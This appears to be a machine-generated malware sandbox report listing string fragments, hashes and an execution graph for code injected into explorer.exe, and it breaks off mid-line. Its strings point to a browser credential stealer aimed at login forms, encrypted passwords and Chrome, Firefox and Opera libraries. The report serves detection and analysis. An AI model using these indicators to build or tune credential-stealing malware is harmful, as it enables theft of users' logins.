                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                      • API String ID: 0-2916316912
                                                                                                                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                      • Instruction ID: 79bd3d995ab8c872a40b3938b77c51cba7b7c353e59015f08e04714ebe636b2c
                                                                                                                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                      • Instruction Fuzzy Hash: 79B18B70618B488EDB55EF68C489AEEB7F1FF98304F50452ED49AC7261EF70A405CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                      • API String ID: 0-1539916866
                                                                                                                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                      • Instruction ID: fe2a32e4e62d15b81524ab837f6f5623ceed962c4ec0bb4ad2ade666679c712b
                                                                                                                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                      • Instruction Fuzzy Hash: 3041D370A18B098FEB14EF8CA8457BD7BE2FB48704F00425ED809D3245DBB5AD458BD6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                      • API String ID: 0-355182820
                                                                                                                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                      • Instruction ID: 1324c5ee16461b313f27a6126ec14473ef1796e5ca9deae38788a48845f5e905
                                                                                                                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                      • Instruction Fuzzy Hash: B8C16A74618B0A9BC758EF28C485AEAF3E5FB94308F40862E949EC7250DF70F515CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                      • API String ID: 0-97273177
                                                                                                                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                      • Instruction ID: 80973e9031db2bcbb4932ea1d16d6fd93294dc04c7410af2fb3bf858ba5f9f97
                                                                                                                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                      • Instruction Fuzzy Hash: 4351E5355187488FD709CF18D8812AAB7E5FBC5704F505A2EE8CBC7242DBB4A546CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                      • API String ID: 0-639201278
                                                                                                                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                      • Instruction ID: cfc06163ceb151aac5dc159ec435cae0cde4ef2bcd5f8d4068d49e0de59a8384
                                                                                                                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                      • Instruction Fuzzy Hash: D7C1A175628A1A4FC758EF68D495AAAB3E5FB98308F50832D845EC7254DF30EA01C7C5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                      • API String ID: 0-639201278
                                                                                                                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                      • Instruction ID: da7af58f0130fb747132dda5ac731f3702bf344d2081a19b7a87626073b5f0f7
                                                                                                                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                      • Instruction Fuzzy Hash: 19C1B274628A1A4FC758EF68D495AAAB7E5FF98304F50832D845EC7250DF30EA01C7C5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                      • API String ID: 0-2058692283
                                                                                                                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                      • Instruction ID: feee7ed0cec1a5fa959ce456c53854b78c7f9ecfc95391298f4f47268ea5747a
                                                                                                                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                      • Instruction Fuzzy Hash: E5A1BD70A187498BDB19DFA8D444BEEB7E5FF88304F00862DE48AD7291EF7095458789
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                      • API String ID: 0-2058692283
                                                                                                                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                      • Instruction ID: 964afaab6b471ea16513eef4296614cde24512761a6a458e3456cfb9ca9d6f3f
                                                                                                                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                      • Instruction Fuzzy Hash: 62919C70A18B498BDB19DFA8D444BEEB7F1FF88304F00862EE48ED7251EB7095458789
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $.$e$n$v
                                                                                                                                      • API String ID: 0-1849617553
                                                                                                                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                      • Instruction ID: 4a5fc99543c54d3c60f92a6effbd261f8b25acfbe7b97c2008db555e48b4ab06
                                                                                                                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                      • Instruction Fuzzy Hash: AB71B475A18B498FD718DF68C4887AAB7F4FF58304F00062EE49AC7261EF71E9458B81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                      • API String ID: 0-1970020201
                                                                                                                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                      • Instruction ID: 218c423250a3f7d2ef629d720e7754f8fa31561f50a0b09698105ec10c49496a
                                                                                                                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                      • Instruction Fuzzy Hash: 2C516FB0918B4D8FDB54DFA8C045AEEB7F1FF58304F40462E949AE7214EF70A5518B89
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4$\$dll$ion.$vers
                                                                                                                                      • API String ID: 0-1610437797
                                                                                                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                      • Instruction ID: c96abac9f75da0244fb46ac677783a46eb220328160059d97f7ed2fac03a84a9
                                                                                                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                      • Instruction Fuzzy Hash: E6418535228B4E8FDB65DF2898457EB77E4FB98305F41862E945EC7240EF30D5158782
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                      • API String ID: 0-327345718
                                                                                                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                      • Instruction ID: b4a872bfba2441dabfd1e257473bb6e28f6b571a1f2f1310e2b9bb11c1c25443
                                                                                                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                      • Instruction Fuzzy Hash: 43415E70A18E4E8FDB94EF6890997ED77E1FB5C304F51866AA80ED7210DA70D5408BC6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .dll$el32$h$kern
                                                                                                                                      • API String ID: 0-4264704552
                                                                                                                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                      • Instruction ID: 6cca1d0f23cba98ff3232f258811814b9e4ae817e7fd9c2ab3a812d4d4ef3cc3
                                                                                                                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                      • Instruction Fuzzy Hash: 0E419470608B4E8FD759DF2884883AABBE1FB98305F108A6F949EC7255DF70D545CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                                      • API String ID: 0-3434893486
                                                                                                                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                      • Instruction ID: 67c8a372d602648f0d5e4a1c1658a33ab423d4e67765e7d60303b037781112d2
                                                                                                                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                      • Instruction Fuzzy Hash: 9031E67550CB895FD71ADB28C4846EAB7D4FB84300F50491EE4ABD7251EE30B549CB43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                                      • API String ID: 0-3434893486
                                                                                                                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                      • Instruction ID: 566656203df531d7371b32ce496551aa215794e18b97bc0aafe563e54b1315b3
                                                                                                                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                      • Instruction Fuzzy Hash: 4531C175508B496FD71ADB28C484AEAB7D4FB94300F50492EE4ABD7251EE30E64ACA43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                                      • API String ID: 0-3136806129
                                                                                                                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                      • Instruction ID: 8dd73333e5d028319779187d0fc6653679336933b1c41aa70089bf24d5e65e72
                                                                                                                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                      • Instruction Fuzzy Hash: 3D315C74618A5A4FC784EF688494BAAB6E1FB98304F94863D944ECB214DF30D945C752
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                                      • API String ID: 0-3136806129
                                                                                                                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                      • Instruction ID: 15aea6f459e7b3708c2debd439022cfee3df77a9b339a2bb1e5c63eb8f35bf5c
                                                                                                                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                      • Instruction Fuzzy Hash: C9316970228B5A8FC784DF688494AAAB7E1FF98304F94863D944ECB254DB30D905CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                      • API String ID: 0-319646191
                                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                      • Instruction ID: 3c268c49cf20d2663d04b9ee7d309185c2e01b4d8c12ccc021ddc59a78953984
                                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                      • Instruction Fuzzy Hash: 2D31FF31710A4E8BCB01EFA8C8887EEBBE4FB58319F00422AD45ED7240DE789644C789
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                      • API String ID: 0-319646191
                                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                      • Instruction ID: 43968281413fb8d43ad2a26ebd49c981197d29ae5862fbeae2d5473766686f36
                                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                      • Instruction Fuzzy Hash: 4921CE74A10A4E8BCB05EFA8C8847EDBBA4FF58309F40422ED46ED7250DE7496458B99
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .$l$l$t
                                                                                                                                      • API String ID: 0-168566397
                                                                                                                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                      • Instruction ID: a75654cfc559dea1efeb3a1b427e62338fc47dc6aec7718e47f399d97cbf9e7a
                                                                                                                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                      • Instruction Fuzzy Hash: FC215AB4A24A0E9BDB48EFA8D4447E9BBF1FB18304F50462ED05DD3600DB74E5918B84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .$l$l$t
                                                                                                                                      • API String ID: 0-168566397
                                                                                                                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                      • Instruction ID: 4243dba5484084f6f409a4cbf232192b451e03f8b14b32adece099ef9a9504b9
                                                                                                                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                      • Instruction Fuzzy Hash: AF2148B4A24A0E9BDB48EFA8D0447AABAF1FB58304F50462ED05DD3610DB74E5918B84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: auth$logi$pass$user
                                                                                                                                      • API String ID: 0-2393853802
                                                                                                                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                      • Instruction ID: 189dc6c83f84c8362c7286ede895c4fd5be0a7803f95175bca8d141abc9e07b4
                                                                                                                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                      • Instruction Fuzzy Hash: E721CDB0614B0E8BCB05CF9E98806DEB7E1EF88344F004629E40AEB344D7B1E9158BC6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:1.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:1.9%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:633
                                                                                                                                      Total number of Limit Nodes:77
                                                                                                                                      execution_graph 91957 21af12d 91960 21ab9d0 91957->91960 91961 21ab9f6 91960->91961 91968 2199d40 91961->91968 91963 21aba02 91966 21aba26 91963->91966 91976 2198f30 91963->91976 92014 21aa6b0 91966->92014 91969 2199d4d 91968->91969 92017 2199c90 91968->92017 91971 2199d54 91969->91971 92029 2199c30 91969->92029 91971->91963 91977 2198f57 91976->91977 92449 219b1c0 91977->92449 91979 2198f69 92453 219af10 91979->92453 91981 2198f86 91988 2198f8d 91981->91988 92524 219ae40 LdrLoadDll 91981->92524 91984 2198ffc 92469 219f410 91984->92469 91986 2199006 91987 21abf90 2 API calls 91986->91987 92010 21990f2 91986->92010 91989 219902a 91987->91989 91988->92010 92457 219f380 91988->92457 91990 21abf90 2 API calls 91989->91990 91991 219903b 91990->91991 91992 21abf90 2 API calls 91991->91992 91993 219904c 91992->91993 92481 219ca90 91993->92481 91995 2199059 91996 21a4a50 8 API calls 91995->91996 91997 2199066 91996->91997 91998 21a4a50 8 API calls 91997->91998 91999 2199077 91998->91999 92000 21990a5 91999->92000 92001 2199084 91999->92001 92002 21a4a50 8 API calls 92000->92002 92491 219d620 92001->92491 92009 21990c1 92002->92009 92005 21990e9 92007 2198d00 23 API calls 92005->92007 92007->92010 92008 2199092 92507 2198d00 92008->92507 92009->92005 92525 219d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 92009->92525 92010->91966 92015 21aaf60 LdrLoadDll 92014->92015 92016 21aa6cf 92015->92016 92048 21a8bc0 92017->92048 92021 2199cb6 92021->91969 92022 2199cac 92022->92021 92055 21ab2b0 92022->92055 92024 2199cf3 92024->92021 92066 2199ab0 92024->92066 92026 2199d13 92072 2199620 LdrLoadDll 92026->92072 92028 2199d25 92028->91969 92424 21ab5a0 92029->92424 92032 21ab5a0 LdrLoadDll 92033 2199c5b 92032->92033 92034 21ab5a0 LdrLoadDll 92033->92034 92035 2199c71 92034->92035 92036 219f180 92035->92036 92037 219f199 92036->92037 92432 219b040 92037->92432 92039 219f1ac 92436 21aa1e0 92039->92436 92041 2199d65 92041->91963 92044 219f1d2 92045 219f1fd 92044->92045 92442 21aa260 92044->92442 92047 21aa490 2 API calls 92045->92047 92047->92041 92049 21a8bcf 92048->92049 92073 21a4e50 92049->92073 92051 2199ca3 92052 21a8a70 92051->92052 92079 21aa600 92052->92079 92056 21ab2c9 92055->92056 92086 21a4a50 92056->92086 92058 21ab2e1 92059 21ab2ea 92058->92059 92125 21ab0f0 92058->92125 92059->92024 92061 21ab2fe 92061->92059 92143 21a9f00 92061->92143 92402 2197ea0 92066->92402 92068 2199ad1 92068->92026 92069 2199aca 92069->92068 92415 2198160 92069->92415 92072->92028 92074 21a4e6a 92073->92074 92075 21a4e5e 92073->92075 92074->92051 92075->92074 92078 21a52d0 LdrLoadDll 92075->92078 92077 21a4fbc 92077->92051 92078->92077 92082 21aaf60 92079->92082 92081 21a8a85 92081->92022 92083 21aaf70 92082->92083 92085 21aaf92 92082->92085 92084 21a4e50 LdrLoadDll 92083->92084 92084->92085 92085->92081 92087 21a4d85 92086->92087 92089 21a4a64 92086->92089 92087->92058 92089->92087 92151 21a9c50 92089->92151 92091 21a4b73 92212 21aa460 LdrLoadDll 92091->92212 92092 21a4b90 92155 21aa360 92092->92155 92095 21a4b7d 92095->92058 92096 21a4bb7 92097 21abdc0 2 API calls 92096->92097 92099 21a4bc3 92097->92099 92098 21a4d49 92101 21aa490 2 API calls 92098->92101 92099->92095 92099->92098 92100 21a4d5f 92099->92100 92105 21a4c52 92099->92105 92221 21a4790 LdrLoadDll NtReadFile NtClose 92100->92221 92102 21a4d50 92101->92102 92102->92058 92104 21a4d72 92104->92058 92106 21a4cb9 92105->92106 92108 21a4c61 92105->92108 92106->92098 92107 21a4ccc 92106->92107 92214 21aa2e0 92107->92214 92110 21a4c7a 92108->92110 92111 21a4c66 92108->92111 92113 21a4c7f 92110->92113 92114 21a4c97 92110->92114 92213 21a4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 92111->92213 92158 21a46f0 92113->92158 92114->92102 92170 21a4410 92114->92170 92116 21a4c70 92116->92058 92119 21a4d2c 92218 21aa490 92119->92218 92120 21a4c8d 92120->92058 92123 21a4caf 92123->92058 92124 21a4d38 92124->92058 92126 21ab101 92125->92126 92127 21ab113 92126->92127 92241 21abd40 92126->92241 92127->92061 92129 21ab134 92244 21a4070 92129->92244 92131 21ab180 92131->92061 92132 21ab157 92132->92131 92133 21a4070 3 API calls 92132->92133 92136 21ab179 92133->92136 92135 21ab20a 92138 21ab21a 92135->92138 92370 21aaf00 LdrLoadDll 92135->92370 92136->92131 92276 21a5390 92136->92276 92286 21aad70 92138->92286 92140 21ab248 92365 21a9ec0 92140->92365 92144 21aaf60 LdrLoadDll 92143->92144 92145 21a9f1c 92144->92145 92396 4692b2a 92145->92396 92146 21a9f37 92148 21abdc0 92146->92148 92399 21aa670 92148->92399 92150 21ab359 92150->92024 92152 21a9c51 92151->92152 92153 21aaf60 LdrLoadDll 92152->92153 92154 21a4b44 92153->92154 92154->92091 92154->92092 92154->92095 92156 21aaf60 LdrLoadDll 92155->92156 92157 21aa37c NtCreateFile 92156->92157 92157->92096 92159 21a470c 92158->92159 92160 21aa2e0 LdrLoadDll 92159->92160 92161 21a472d 92160->92161 92162 21a4748 92161->92162 92163 21a4734 92161->92163 92166 21aa490 2 API calls 92162->92166 92164 21aa490 2 API calls 92163->92164 92165 21a473d 92164->92165 92165->92120 92167 